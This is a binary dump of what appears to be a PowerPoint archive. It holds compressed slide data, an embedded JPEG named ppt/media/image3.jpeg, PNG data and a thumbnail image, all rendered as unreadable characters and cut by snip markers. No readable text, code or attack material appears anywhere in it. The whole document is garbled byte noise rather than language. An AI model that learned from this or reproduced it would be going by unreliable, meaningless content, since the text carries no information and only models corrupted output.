H.....T.Y=...-...zy.1\G.!........c..Y.5.i.......}.Gin.R...&vh....V@p..-..3L.SR.!...t.mm.?...................@.\-........z..<.O.o.>..]....ze.o.i..0.;[o/.vu
.....Y.c..0s]....A\&...z.:..[5....*..4l\..<.........[8<..z_..[X...].....&..~..g..BDV.F..(.$..).......zEcj..=....V.;.X....C4.bB.....aI.'.k......e..4.+..9oV.O...TM....&uR.n.......e...N..xq^....ZEs.$x&....X.R..r..`.......R......Q..ZV..."....1...,.+.U%.0#.    $.....G..b.4..Msk.....c...n8$.I"}.`...^O".Y.Xi...i*t{K.H35.D    .].6.VR.J..N}r8~...2.Q.i....[.4.......9.....?*.....6.HM......v6.<7O.......A.....lF6.d.PF.<..0A6.m;F....f....$P.y.:.'j.0.I8.\w.%...Q4..i.2.s..^V..O....`.{....Q.l......K.fh .m!gFg&D'*. ...pz.{_....LiY....'..?....6.g4.[.oo....[.l..X+.....W....G.&.....o-.....yl.Y.....n.....hX.Kih..{=....:.v..EU...t.nn....84.:..iRo=W|....##..........u.'@....y.Y...H.".ZF....D#..O.Z./..;..k..m>[.uQ..Z.<AyP.FW..:T..z..0Gq.y.=..I|.o.l.....'p...j`..M..%......I.wHD{:..._.{S.........I.K}.O.:....v..)...rT.A$d..y..,.=.....r.=L.s5.....eN    .3..Q...Z...Q...h...me.U.S+...z0....pz..e.=@i....]....M...........$..K...........;k._....~..iou%..V.._>o,`;..lt..x.I.I.....M.....+._A$.*.o.".......@...=.q.=+RKN.'..C.........!k"..p$...A.7w.*...#}..n[L.mB.....}..m.d!'..d..x....../.....k.I.1....5
.:....r..L...r.vRj
........`>3..:.5...~.._.....;    .!.!
..+>.*?..r......o...}..I.A5........0[..e.....PG...E......!Gc...l.4.}=......f.UDuNDdc......:.....A..j...\.q.1....=..~..=W.2Co{ii...p......[48.:/...Q... .l...k...[XigO..m:...HX4.H..6s.0...$.    -.<..+..W-k..P......lm'....    $m.......2.bH.<.MB..S..,n.}..f7\.......X.....iw.Y...Ijc.\.f_1ZN8+..........MM>..]I.%....J........p..-.N..r....}..us..K.....[.x...\F..A..
..3q.|..j.0..$..y..y.i^.T....+..9...F}s..%.y5...)..$..z...Xg...a.f..    3.~.a..x.$.<-.^.Aku.5.../.....2.'f...(.Q.;A|...(..........Y.N.....rG....3E...".....{...MjA..v.qZ%...;Qf..9.@..I.+.C....=|..o....].4.{x.O..9..0.v.w..<{.....4.
j..4........l..AZ.B.6...o.H
Uv..@...7.iy...._..9.M'.....Ey..J4.q........LG..`.t....M..4.. ..!....X....wVr..Lk)..7n;..y...^.Z'...c'.....m.v..].....I.U_.h~!..u    t.9...f..nQ-DF .z...a...Q.%F..Pu.O._..;_.cOK....x..Y....y......-..n.F..1A.n<q...K}.K..k{m6.../$..
.c.;0.6....1..jX.KC....M.].l...v.'.#S......w.F6.zV..um...]..9..{{Qogm...[.s..$.2@....y9,...(K...~...._#.o.b.-.V.GC,P..A ....@X..U....y.I..p.t..0H.....B... ...z.5.3.z..I....Y.....=/.[..q,...o.n7..VP.....m.N....:hvq.....os.w.3Z,...d..py....`..    ..W?.w....r.^]^.,q..    ..$.q.*...e..f.......c...
.........<(.s....-.O...~&..Q@.`Z......O..ym..IlM...32y.!U].UQ.r.$......[\\x.Q.'{3.".....R.7.qbTmb[..pS..-..+k....)...H..    .K........[.?s..m..m.R...>=*.Qhn...2]MT"..F..?7.........N.mZ.Rf:..`U.m+!Bs.s...{....Vil..j.....m:..x..2m..#...pX....k?....J....0.R.\.z..."&..U..p%b....r..b..,.j..S.K.K-4.wQ..heyL...h.l.H)..n..=.G.Vz...$....E.<N..............Fs.>.h.mod..I....YL?.G...DaB..~.S..NO.?.?...ko...)C.Kt..e..V.#.1..N.......A.Ab...........6..K.......Eo-.,~J4..3..A......9.......KmOR..l...C$.0.!C.C...rm?1...........*]..r.X|...(^:b%.s...........c...[h.Z...<.s.x!..F..$..:.x.['...;..]Yk.o6....Zl.RB..../0v|....)o..=..A.E...s........1..?........0Fs.:.Z...m..../:.>..{.Tb5..@..z..8..R..M.......C},Ka}-...3.......
r...L.R..O....}&..)V.....c.'.H`.<.....OLS.....L...;Y$.i.....D..bT........rr...iW._I+\........J.l^8F....c..._..3d...Z..b...
E...3.c..rrFs2...U.3Si~9.Pi6.i..jWZ|..    fc....`. vPs.Cc..Fz.4k8on..y..\......D.e8..\z.{.V,.....O..Q.{...%..]...W.FY......5o...=.Q...u[{D.o......_.!........~..v`...d...WKM...O~.......~....5R..8UbI?..|..i.]Z?.A;...[K.....B\.....+'2.s#...r...^t.ml&...i.E...W.A..B....\.|.. .........<q......9$o..;".qn..R..q$i.......#5|3...WF. .....o4.4..QFa.p.Y.........=...>..P..MF...]Iw....1. p........y4._..K..]gS..-.Z.....U ..X.c.^\7Os..>............?..qa....6.j0i..a...|.@.oU..'.:.[...........sqg.....2.N.....A...lt.{mgT.]>.....>c.H;....m\.......+A.I...+..N.......$...;....@...3..]..]...|.C.x......5..ij.w2..e!.....Rq....}...<seck}5..}d......*dYX.0o3b.T.........ME.6.I..6".m.......p..n...=[y.......B...Xa...d..l.0.X....`F1..R7n.........;t].U{....G.$TB.r.Q.....I....C.=.....$.N.b.......m*.FNv.).#...9...U..eg....nb.....v..B.F..x.J...c..Mki........E%..l.........0...rIn.yj......._...lY.&.-..Vv7.^.y*E.@. B.$.T...b. ..kZ.7..8..I..+K P.Gs............jzW.k.}.)....b.^9..,.*....p    ........$.....L.r...7.0FN.8;9.....T...lZ.d.O.cH.....*..@.$.H.. d.=w..N..'.....&..Y...[tv..$...,.9.:c...P.....Mmw.i...%...V......-m..3.a.
.MV...|lf.V...V....uk"3..5...%G...c..............F<sot-.[)........1./.D1.....2.A.~*....X..>.}m5..v.\\.."U....nS.w............ .....m.-^[.L.LT.B.....@.g...m.]O..>.z.e.....
]DJ.xt...I...@b9/.....|.............u.;......qp....i.`.".M.1^.....].<Yt.....R.......=F%u.0    ..rt;H. ..Gb...h..m...Mn4.t.bs
..H...c. "......_.....[].Z..........$<..,A.w6IRy..........JM]_...*.....N.}.....o....6...[.V.....*.h.p..#:.^...u..s,.....*....W..d.1.9 ....SR.tZ.R......l..........gk|..m....>.=..=...(R..-..|...#................[$......4..E.....,B.c.....+5t]..g..._c.~..........Ch....J.s.."f.;.A.......'....a.K.J.m..TI....s.q..F.?:.$W.T..'U.X.Ya*2.Jl`q..~...*...|;.].....vw*.Y.....<.2.k^.
(..
(..
(..
(..
(..
(..
(..
(..
(..
....8.;x.h.<....Y..I?.MT-u ...Ql...X!.Y.e....q....;}3@...........~.-......+...0....\......{jx.k.6.ic%...0.4Q.......X..^pj..u;..F.R..;..S,.....A,W.m......+MX2...........Xj:...u...=.r.Wz|..o.B.    .......s.............o....[...^.{[E.@."2"..RN...g,...u.&.u..........^...#.....+...h...G.u6.F....f...Eox|...1...UN...U]J..........N{v..h..IPJ....D....|.y...]3J..-..4p..Gyeyd..vw%....O...U.}S.........W1,..$.z.F...`..SQE
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
(..
..D.....e....If.-.B..nC..IU....Z.P.?.o%..........'..(..p........R.Q...6.=7N..&..5.e....z.@8....U.$Hci%uDQ.f8.z.Dr$.....0....=A.u..vL......@.W.oY>..o........|U8.2.k..jW.-.cd_d...F.T3e.~.R...3]....],.TqO....RM.Q.0;Xu...Q.7..3G&.(....:......_bJ*..,.[.q..+.`........K......961G...a..t>....cp.Wh..(.$(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...+........q1S5.._@..c......-..~..E...........LV....n..W.u.1^.....V.....{MSQ~~..-.'..r..j....[,J..4...8.....nH.''...,m#.H....RL....=r;....R,.......*.Bt.Oj.`..yN...|....S......._$a.Z.......F.;...f(.........u..kn.,........@waF3....[YZY..-.0n..*0...).i.7...Y[.(...)n:rEm,<....i'....C......VVkO4....Z..i.Y[X0..u..e.1..q.#&..z..SR.....8....V...]E.\C...;dP.?CIoimi....(P.....}x...J....e.E._.?Y..t.......&9Z-.V3.......>....sN.u..u...F..}Rm..Cn=...    ..We..?....g...}.........&FF..(..2.....x..............:^>.M8o._.sV...y<....+....)bX..$....U..#0.H...o.~]...y...s.5.&.c-..$..y....)l...5,..]E.\C...;dP.?CZ,5Od.)]....s...Uc8..yW9k.cP.......9.T..O...~3.....&.uc....c..LeA..20Eh..d..+Y....#s...t...T...F)..X.T.C....B.$.....}...E.h>M..mv..o^.....gXU...#..1&[~2....~...._X...c...i...yA.#$.\...6..g.....- ;.f.......Sn4...V.....m.H.......kk....?^..6X..~._.w....sw...s}.Gf..i...|.....\..g.i.b.|I.Ho..    ..B....x....9.t7.m...\Y[..6.$J..NE9.,.c3Z@...\..m.1.LU}V.?3...W..n....n.#.ak.l....W.%.f....].^g@.p..f..Q....i.j0....@)...ec.m96..(.HQE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE....PK..
.......!.................ppt/media/image3.jpeg......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......    .k..".....................................
.....................}........!1A..Qa."q.2....#B...R..$3br.
.....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................................................................................
.....................w.......!1..AQ.aq."2...B....    #3R..br.
.$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....G...T.d?.#..t*}..ST...m2.R.....C$.m-.GS.    ?..u..N...e./..z..E...$.....K....Q.?....K.)..s....=@........U..O.a..T...I..B.|0.$l....`...*.O.w.j..-...hW.......,....Ol..#%..`.F..8..smj.....Bz&........[a......72..V-....n.1...n..P.............J-R...N...+...QG...7={...k....<5...e.....j../m...U$.>b..c9..*.`.)G_.....Lr....N...E..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE....G...T.d?.#..t*}......*.....m5....<.DpX.O]...c[..|I...v......@z.l8.r......J4mVX.[}..7RO.G.V7....W.]w......w..k}.f!sm+[.P.R......:....Spk76.5PKc......b......"ed..ycp.K,...$...M.k~..uW.-..U...Bnn.{.........a..p})...i-...=C..N...>.....?..?.d.....k.....Uy~8...s..#....d.......~................O.*...H.i.(8...........+F..{_........:..'...1Ie.....<.u...Fe=._Z.u..Q..M..."=...?.v..-W...G......:%.+*Z..Xdf4......3l.a.]......s.(U.8#.O........O.*...^...>.....?....!R..9.._...o......i...R................^Y..\b.v.....Yz7..............c........?......h.a..R...........O.*...^...>.....?......m...v....?.:M........E.K"`.p3.{.Y^............C..Upm.g$.QE.d..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...D...O.C..?.G....\.............].r.....^..........[...-..@..Q...L...zS....
.4....09..R......V.;.....U.W".t..-B.tS.V..p3.ce......+.....8...c..[.GFPk...[...U..@bZ..RA..z...u..z........8~.......,...?...#f.(.<.(.Q#1K...P...&.3F.p..P.[i..R..#.b....<E..._...q...n.."..}.o.Q...k.+Z{..
(..3
(..
(..
(..
(..
(..
(..
(..
(..
(............L..D...O........./[........].r.....^..........[...1...qJ+..].Rb.Z1@.wJqB)....A..$..7.Wr.9$..M*...f..~(.O&..dW~...g.@.....i..}..x.x..^.z...cW.}...q.....xd..\.\..4...I....:..U(]].~..Z.K...J......'.....t..*.......y?.j.2..V)q@...T!....A..f).R.J(.........R.f.7f....<...P...]...h.....
...Z.V.`..-..../....k.........Q[...Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...D...O.C..?.G....\_.....;h.6.{.P}.?.Wi^{..<......~....9........|..9.......3S..l.....k..U.0...=.+......Q.sO..` ..I.<.....Lf.....D...f."2.t6.[xW.$..=.X1F.h.......n.m...."&\K.&...+U..[.K(..."..V.'.5Y/#.<......!....Y2.5i..,.8.3.......SuT..J...5:A..1.W;ve...Fw....R`Vz.......e.2...Yj6...L.\.#..?..RW.c....U....S.N.# .C...WO....;..)...\..tn....S.k...>.a+).......g9.Ke$m.Qq...W...    ...._LW.~.B.).q............]..(....d.Em...*E.j].v
..d.O@)..29..QE..QE..QE..QE..QE..QE..QE..QE....G...T.d?.#..t*}........xR.....OA..s......T"o.Z.....t.?w'53.YP....B....>e...+.t..L'.w..P...5T.J..jH|...x;.%...t....D$.....(.."..]:p.....<~..X.._E.&.....S..^a.7..>.F....G.,d)bX..^x..."..U=>.
./.A.j..#q..O.k."....5.(TB.z..]A..\sX.....D.9=~,]+/B.....X@U.....%@.&.[i?Z.E..d(H.....vh_..a.D.e.P>..9........&....Z79!NMs..2@..9..\Y-#Fz....I.......G|........$ID....t {...5..{..`.76...o...7.......H....Z...e.gs..(..2+2.8.o.i... .B~...z....>...<(.d....rz..fk...2.'4.d.Kc..5.i...*.*..I9..#.>q_GW.>...f..._C.?...:.h..*.a....k......-.........5./m...o..}.$Mm;..P.q........o..K7.$.Z......8..5....;.. ....'..%.;....v.tn......t.+k..{.z.6<...}GS..me.......n.&....e
..".1.bB
.~G^2u./..V.0{O.}7O.....+..G...e.#n.!$...(..G.=...[k.Owk.......6.T.8...g..@.+.Y4QJ.v.9d..q ..H..y9.c..N..wV..?..EgC...k.`..%...r...4.u...q.....:%...vz..qm...hnQ.....8..q.H*+ x....\k.Y.Y../#............z..P.....P....B.Mq*..'.,H.h.............=....Iu...lf1.8 ...{{.:G.t.wX...../a..)Z...e]...n@ =...`.sn.(...(...(...(...(..C..?.G...!..Q....S...[..$.aR2...j.k.....a.......Z..*..<?T.......c.Z?..=..;.WYEV,.....r+...u.W-.xqay/,..N..w.......:......
...cr..)'p:..jVLd...RKn.g?xrJv+s{O....P. ..;}+F.?>t...k...K;...#......z.n...r......Ui.IgC0T.c^...T"Q.dp......R.p.{.D..e{....5Q.~)..f......I=..*.$...1...R..
g.FsM..BY..."pJ.hp~....gh...(.
..o.RG.m-.......r.Dau.M...gx.;z1m..G~..SK..}....C......4.eZ
...[SNIP]...
<.Z.z..i....lni):5=..y.^....3GN.2...;.....ss..s:..........3.......U...b.Y..{.Q...1.....I^..s......:.<%.~....).H....d.5.Y,...oR^S.JZfj.. jV..t<#%m.r..L.........yi.....-.9.h^.6[..y../........|......'.s.b..M..JW.4/..9.`.o....7......su.T...7P:.j..|..Me1.J...J.f.i].A+.l
.Jm8........._d-..<........X..u-...{...}.N..=|l$.J...&*....z.....vm..-,E.z....t<...[...=v...O.S....k.<MB.g;....]j...E.Q..h..QA.%.,...I*>|...".....D.T....d^H......H<7..U..S.....@QnS...t.as.?9..........?..S...8~......;16>.....S..s.h.....r.0.b.t..va..v....;.L............j...7......2R.......X.5G.M....e*e8h4h...........|...}.....>......0..Htrj......`..L&{...G.;.aQ."...k.........a...e.wk...VO...w.=%./J..J.y~...\.}'...`.&\.......\LH.I.P{)....E"...........[....;.v......9....................ZXX:q..............._...M.LN`1.<.v..p8U.......x%...l.........J(Km..NNr.{uR.}.."..M.._x.9C.}S.3..:...W\|..kC...f[=.w.......[..N.....N...y...Q..s..;W.....n.......]z{z...?2...v...W|...E-c.<.c..f.....x.t(...9.(Tc..d...r...R...+....n...}.}.?......'N..4.t*.r:..PWW...UlV@..n.0&....d..+.q%..y.....CQ..U..c..xz4.Y.7h1.....~,................T7Hu.N.<}.......<^owW..5..7.z8...;9f..1C.+..2.}...=v*..at%....'.~.........'.f..~......s.s...m.......(._F.<....fJj..dU.<^.[C.....I%.vE@.s.6.L..+)..d..l.7.P.........E..clrj1..    .....q.v.R.4..z..1'..,-V.....D.t*.....(~2..bB.TUEOU....D(..E[5.3R...:.i..K/.x~!"-\2....d.......y...._s...h4.9~z.........a..6.}...O..."r.k...|.....~....W...)_.3...M...-..b.6*=%.L.m.. ...d$.F.......V.d2.......@....J..96.    .*..P...|....E....`..V..I..s.B...=.)...Z2y..E..5.-{IwT.tV.@.....(..@.....R.XJ....w..'.J`,    .....lv'..C.[&....,D..N....D.S.R.......t.....s..n++^u.5......+>......\.B...b..c....6#..{....+.& ".<.iojY.I.u@@1`DsJ.z>..e..Yr,e.....?..
.\p^*....w?..>,..jpprb..k.=.z..k..@a..
.2....boO......-.t._.f8......R......y.._Y...._.)../.S.-.^k`)..1"_.!....FE.(.S.P..)..i.-..(..m..........m....1.rn~!....g ..........c......|...~.[...$O.....@...W..I*...m{wo..C...7.....U....9..p. ..Bq.-.+.Hs.x.]!...7..N37';.pg....u/...a.n..?....im%...MG.?.d\.."..[R.....L...x_..7ra...../.u..'t....TB...!.r.T........f.c....np.8J.*.$p...{.d@k96- '..J%..%6...I.d2_...A8*{{{0*.fw.:y....m9l.%.%..g......T.g.$(.!@..:.Ug.G..g.....c......=...h*....`.a.IL.v.l...>Ix 1....o$..&.....{z.|R..~Czq1r.%.ju.;*...i.Q.Qf    .B...p`..E.Z9....\.......0v....~?...w.gP.V7........0...'...Lb...J.f..|&....9..65..pT+..B...})3.0T...H2;.........1.I9..n..D!...I..a`    .;....%"X.$.[Z..`...%..R469={.......!Rm.%3^....2G....A ...#....t....._..q...D..m-..4.........YZB...f.'bn..+2ch    'E,..H.".x2.I........w....P..#`.........    .B....z?....7n.......H.....#.............p>..-..r2..!T..~._.........ul.S.    .&B......|..+.~.fXm    lh...[    ...!....X.C.{..}M..%.....U.Q.G....#P..C*....`..t6.u..../...A...EH. .....1\. CY....KY    z... ...B.y. .k........!@.T..1\%.QXB.. ....E...y..RF.....!P    ..p..Ga    .B.. .....g8l...yK.A){..^PI....$j
K.4..r[.r............SX...l....\.....U...
EF..B.......D..x.et..eM.V.D....HC%.M.HA.......J.".\...,.r.K*li.....NV.7......K.E...........(.z.j..Y.."Fyi.L....|...C...X.x.....L.....!.F@..T..T.m..S.....ux..........r......W?...
.b..b.+.>R.wB[c.y.]aii.^...f...JV.'.%.......h1xD.f..h.?....U...M.M4...u..\.......I.0x.Tx.8......mAa.).UG.fP'@........R?.'..rr..k.%\3?..X.)....lj.=.......X..~y..hgD...r[.j....(|.r&....3E......4...F..........g......w... Y..J...W4.r%jSL.....0!....k[.7.....84[.D..( .}b$....F2.....S{...JFP..Qk6.J|..I.?1..Fb'.B..(....fY.I...U,...x#.N......3...G^.G...U?,Vr..~..+.....v<V.E1.y,4..D. 5B@....k.(vR[O..    .Ig.(......3+.G.......Y.e!.U-.._$L...d..`...!.M.F"......D.J.."..p.|../.z.........T12N......
.D.....[T.iQ. .    k0..@..A..).X+.....J..:#Pu.+..6x..\4-.]#..M...7..R.....Lcco.2.t...@.. .c.W..2.L......b....:.n<:..8V..,6d...... @^.......tV_o.i$.D...%+oY^....J*$.B....U..$.    ..[}....p.%FP...e1\Im$@.p..KI5.. ...B.=.h7....<....f.O.. ....P4../(...@[1..n..../....V.....r@.J......[..~.....W.v.Et..-...b.7.........<........N~..G.J..._Y...F...n.*L<_...JF..
a...2;.A..".\D........P....?.|a1.._....a?..=.UU+...l.T..C8......y..g....HVw8..}.......    .k..e4%..[=#.....G*.Ss.I........l...>9.....u.-......C......#.DI).../.7C..T%....o..b...XW...g..U.t.fD....$....4v2n.....}.........8..'........S.......YR.Z..|.Z...!....J.?y.....U....J(pP......d...d..@."...R.....|.$.C....%T....[r:_.n...`.G...-......k..........7..sg...I.\.v..f.A .W...*..6.DT..E..U.S.>T...h.?.v..2.KQ......R-.ax..*#..*......3O.....b[4..jU......h.....R...U...gY...j?C..=]o....|.w"..x.Wn....*eYRI.l8.A.B1(...)U...+^._......p....
...(..TQ@x)K.\.#.@U...Ks...x.\....4..y...7:..W^$....O...._>......n.....].....%.JBV.....7n.X..........J......W    <..AK[V......=....z./z....X...3.:U..k...8.'..u..+'E..N......E%.d&z..o..#.....P...6..?=.q.."c?....._.-..>.*~....n.rW}*V...p(Y...eQT..A.(.$U.9.8|(.....9B.....~.....o.P..2..6..L...N..bX.....XH.i.Z....._...~#...........+.......-<-..n..H.6..p.E,...:..-?\.a.........S%&......yJ.jp...w..........    H...G...J>.RN].......t~.z.Ha.....=u...O.....(2..l.M..s...C~...{.......jZ...h.U...Z..U.iK.*    ...y.G~...&...8p........u..U........p..O..?...u.{.....D==..    ..o....`.NGC
.>....y..*!.Y%.R..i}...~q......>=....:...X...O.
.c}".X.
......7......s..'...7>...W_.k...L.-/y.......B|....;jn.....
..q.."......."....h..*..NL..../...Cc..<R..O..>..~..OM..t.....-.......6...'..C.......P.......y.....{..j...U_.... E........MA.#.w...../O....U...w.\.....'W.?(....'67.'..........Ju.@M......UB....[....o.r..7?..W.....86.V@
G............X?<(.....;..W@..O....U.O>.......'......S..C.8.k.X..C~6.[...]bM...........:.w,..g.....v.=O..S...{....r..{:....\.U.Dv..rK.].............j..QnaU(O..T.`..oU.....{..........>/._y.....].eps=...#...Q....._^.Q^..J.a'T.{.Y.8D...    IKv}...j..Q...X\b.75....N...aN...v..r.....~.(...}I.....Z.....>...u=..l......U....../<...V..@8.`
..C..j..([. ...|~;...W.3..~..#..%~2n...R.v.QjK....^G.......E............:K.U.....#..._s.?].x.U..*.:.K8..KB.I^%>..3.5........9....W..m....p..'..p.(~..Y
...j....5"_..Q.....W......Vs.:.D....{...=>
...[SNIP]...
<.fU...........[6...i`.@....O~....._..g.z.>pa.s........7o..c...;..[.zx`hu.....5....m..~....5...9.)T. P'/.....i...x...t/......R...x.ZHj&.$&.....y"..........tr.^3.<%F......dM.......=...,....tdnra:...Cn..>.......?.`......[|..C.BnhhuO_........p...A.-I$Rp*z<>.D#.............$...q.h.D..r.Y...vcu.x&..N.Na..0-....p7B..h..L.c..LB....q#F..1.9..c.....'-!.8........&...@......:;.7E....i0...38x. +...`:..S.    ......H..5    t..Z.#.)7.....3....g..w$.....p....{..3.......t,.....<n.    .N2.E...7m.u....b..u.6......{.nI..6&w...dm..........R.N...H.1....l.d...-W..d_.....c./.. ....p....r..0..+.<.....il#~.}w.....>lE..|..(.r.aD..s.Qn.d.).W`..^..,pH.....:1\...<....D..[.K..vI......q...7YJ.4F.cP.y..O....`.K..x}.T..J..v.&.%.8.C.......=KsY[>cY..w8l'N...C=..;/..k.......c.|...........*.u...=......c...x.xX....`...^l.I........}...q.[...0..1g..q......39....g...5.J....;\...c..c.....m...hl    ;...Y.....#A...'x....q...X... ...@..4A...1...........\gH./..Q0...I."......P.5.i..P.Y3.%..L..a.R(6$.kP...V-...>.+..9.F].:..{-.7...........@0.`6..P....<~..b..X4...../..}ss..=.0F..?zl...>......:.....N..a.6.7..W....
...(x....w}.[..9u.?}.._..'?.....$....D.$...|.F....:.H    .a........~.p/....>.YW_...6...ua...{.Z..i.z.#<.1........?...F...<.J...`........%L3..&....t.+.{......1|......".(.-.e.6m...$..^..K........>...O.?..0.:.Ja..5.....~...<s......s.... -.2$4c...y._.K_..;...|.3...'8....O.FXd..!. ..K..+Rb.......y..]....0...m.....e..1,...........B-......~...../..UXg(.A....4...#.:..lK.5".X8+..^.....l-..c#..=.......w..q.lXw..R...O......I....4.`kSL..f...D,8.:P...;.s2..x.I.Rw...D.....p..oll$.].$:...3.Bp.f..e'.BN..)A..2...p....,....e.z.6..U3..&.......0...g.;.lSo>@..p.U.....h......m..&.b.#.,.K.a.q..f..!H.3.%=b.#7.q
~0...Rr.#..#
X]lo..4H.,j..N$...]..i......8....0...t..z{.d.$.m,..".....`.RnSV...'..#@..8V$I....Nf|.>'.AE.F...9..p.W..`*..u...x....x..<.L.P...8qrw.P+....)..~.Q..3.....4..FA.=N....8...s(..m...P....D:::.k8........`Y...DRJ.h!@.G...h0.x    a)E..q.fnf....(.N<..Gm`..\.........a.[4...d.....^.^..s;..x<....?C.K2........rqC..s...)...E".D.--6. ....r...l..d.........9..B.'.M.o.......z.m..*n.A....=8...S....;    .b.N*m.kS".c.M?...^..N....}.x..$.,.IOOO.....s.u...f.I)d.._............D.D.` ...@...s.2...Cw.dp.....yw..9.[O..i...O.k...X...j`...#P......7....GQ"F\.sMY....D...=..r.B.`........p0.....].!.eD0...Ep.!......\.S.0......S.N.XX..G4...z.#..{aqan......;.'.zp........3....w.^.'1T...--Xr...rl..i#qX.0.pb.7...S.C|altrbb..G......N..._.jA..`(..{.Q...-T4..VG..f.|......N]].k....$m.....+}`D"..;.....6..%.+..X<....,,aJ......^..K......!...x..'.cU8.......08..#....7.=z.?.k.....~;.5Sl7p6..;...........V    ..X.,m...c^...j.W..</.R.....>....J..:...?..a.U..jA../<..m.....nIp...-.....;...Y-.7.D.f...%...X|$.HF.....,...".b.F`HI.w..#..M......+......".3......a}.\.s....%.....%j&m.E..h.'..;W...{.&z.2y....5...)5.H.#.....8R
   .....".45\1%.Wq...+O..a<Y......g0.Zl..L..........I3.. l..n..5y'.....8'1..K?c....C....0a......Ac Wh.V#~..{b..i.( !`...c8........m..!....&.. .@....T...D    .u..(..fy".U./..l..kH+*;.I..f\.1"p..9.....P..k..e.A...
..{AA?."..q.1.`...M.>s`.    ....<gNJ.r..g...1b.    'K~.!3<R:...!P......ro>.... ......t.5..*.'.....    t.%.b..m.&..`.....6......    g.N....W..Dz....W...;...+.=.o2...qy....    ?0../.U.43.Mv.2*.M.T..6g89D`;~T.7.A.....!............a.W.9G.!@....@.#....jdx..../u.`S! Fg4U.j..>.Oq.|......[.....U...\.(...!@.4..-`.5.d..B.....<...n."m.........B.. ...r.hj...........*7.\S.n.K.Ra.J....qH..$...w.k.'.a!1B.r.....6.S.%..F.\.f<k...    M..b..DNM....&.P.B...5.M.p.$.T~..W...H.....Q[.Ra..R.$.Z....i..,......4..y(...%...J-i$F...~y..."..".O@.P.b7...%..8.GQ..sEqk...9...NJ.5...Vy..0.4..    .......R.~./..XU.....Q..%5.d.......+.....0.'.......Fy..2..6.T...(uz...V.4...Ki.7
..@....O..,.QP........%?j...d\-'.    N.].%A0^"eI6yWeIXH.......p..tH..p.{kJj..kIa}.*..0%M.\NY.d.G.K.....P(B...3.ub.:..ttU..REU.....M...Zb\.9I...b#..i..%...#P'.+...*n.. .D:C    .KN....a...X.aY-../B....J.5.t.C.....)i..w.i...f.o......x...D:....L..!@......KY..... P.c......    y.).F..XJ#(.L........3..C........,1\}p..X..:..)..@3"@......i.S?\..E9 ...B..h1...Z..(...!@..... .3.......!@.....p-V`.\B.. .............B.. .Z...`..JG.q...........!@..C........?l.{:.j....$...!@.....h.3.=
H.....!......q."wZ....'B....%;..S.    .B.3.h1...K..+q#.L.....F..;..)...!@.t....pe.....l...#aB.. .Z..6g8y.p.....z.......!`...a8...nIE.....x`.k.#...B...'.-..@1.....i.<m....(.ho..*..e.5l.Z.^..Y.b....B.. .J"..6\.<..!@..:.d..z    6g.[..kN.(U..!@......1\.J..w...U<T..L......J@3/M.BJ.!@..
...ph..).+......CY../.=_yqu#5..#o....TC......    ...@+"........8.5l..$O3.RA.......h^..V.Y
N.....4..)..[C.D.....WR@m.    m..j....".jKHa.....O.`..6..}..........rAr..En j*.....N-&..B'.M..!Ps.<7.-.s,E...7*..]....V?....\......(.VS.........H...DI.L..j../.b.).A...P..G>b\.,..i.+..*\...]..|.D.~6....8.16wQ.[<.v..j)i3    ....4.........)...?...E..X.<..l,uR.@..N...N...
.@..4.ub8.m:$....iz.DG.>Mr.:.....H..rC......LC.-.....N.FJ.d..vE.N.W.@...Ul".M...u...X...1.D............ip*L..DQ!....h6...p.......u.*.b....-...B.    h.p:^P.ru...J..,Y...}%.W2"s....S.C... 8.....G.Lj./.%...@..41.m.p.b.G..0J.G@>.D..o....../@.W...iR]<I.G...,.K.*# .....A.v.E.Ns9.k[YZ..m.........y.f....R..w..Z..Q...Q..KB.....H.)nB.....G5....W.TI'!@....@.. .k|.P
..B.. .j.@.2\.e.9.....E...QW...Pg%hT.V@Q.%M.,%.........d8y.R.....$...a....T.m=..XA...j..UX"%.!.B..hc......|q...*/`..[...fJ..Y...*..4.A.F...H.....!...4..)p.........?.2
C...b.'...3....O.f.5.h..%.S.R..V....K",.%.d/O....6..]........._.4AP......Z,.R...sD..@.!.$k...=...W.;.(.....o.bd...N....>.u....F..`D..Y...*k........U.....CujK....<r.M..dn.....S;.5]&..4.)....~6\...h~........5...X....7.f...).3...2.Zluf.Q..0^d..3..X....)I..T. .'..!P'..|..Z.aY....
/Y....;...
c..c$...T.bD.H...+.c.5.....O...T....:1.>.e1M..O...u...7..y$..]...7.......Ua.....v.i ..uk!P'....9FZU..`.5..*...m'7.....g..'.P'.dp.=d...._$U..f:.....x..y.E`..u"........k].$..G.L..'.i7..d.I.v.V=...>T=..P....G...4.W......m..".w.5p.....F........H+/....U^'/e..[...5..n...t....<..I.H....d..n.Q.    ..A.l..).f.    .p.T...B.. ....!...g}..." $..1.....B.. ....:1..F.M..%.. ...B.=........^.O2....P...B..hr...p......?..%3..k.%.. ...z".`..'i.v..r.b...X..Cq....!..........*ix.....j........!@..C.~..,u*..%~5b.....e.5
E.....!......8.:#Mh.J.W.J!!@...-.@..4....E.. 6.....v..
..B@D.H@...%.....hM.N(....N.W..Q...!.B....Pa.PR...l!h(...!@...-..1\K..%.. ...B.(..pT9..B.. ....3......]    .B........R.....4it    P...!`..H....@............!P-.j...NB.l8....!.x...k|..c
..p.L.P... ...j!...+........0........IEND.B`.PK..
.......!.................docProps/thumbnail.jpeg......JFIF.....`.`.....C....................................................................C............................................................................".....................................
.....................}........!1A..Qa."q.2....#B...R..$3br.
.....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................................................................................
.....................w.......!1..AQ.aq."2...B....    #3R..br.
